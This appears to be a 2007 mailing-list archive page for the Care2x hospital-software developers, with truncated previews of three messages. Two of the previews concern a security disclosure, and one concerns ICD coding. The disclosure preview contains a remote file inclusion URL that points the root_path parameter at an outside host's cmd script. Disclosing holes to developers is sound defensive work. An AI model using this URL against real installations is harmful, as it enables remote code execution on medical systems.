Re: [Care2002-developers] security announcement

2007-01-30 Thread Elpidio Latorilla
Hi Robert, thanks a lot for this very important information. Elpidio On 1/30/07, Robert Meggle <[EMAIL PROTECTED]> wrote: Hello developers, We found a security lack what will give the possibility to misuse our care2x. Try this out: http:///include/inc_environment_global.php?root_path= http:

[Care2002-developers] [Fwd: ICD-OPS]

2007-01-30 Thread Kaloyan Raev
Forwarded Message > From: Claudio G. Torbinio <[EMAIL PROTECTED]> > To: [EMAIL PROTECTED] > Cc: [EMAIL PROTECTED] > Subject: ICD-OPS > Date: Sun, 28 Jan 2007 06:54:48 -0800 > > Message body follows: > > Hi all > Due to the fact that in italy are we still using ICD9... > I have t

[Care2002-developers] security announcement

2007-01-30 Thread Robert Meggle
Hello developers, We found a security lack what will give the possibility to misuse our care2x. Try this out: http:///include/inc_environment_global.php?root_path=http://see-your-ip .info/cmd.do? (just bring the root_path-variable as GET to the script). Inside of inc_enviroment_global.php there i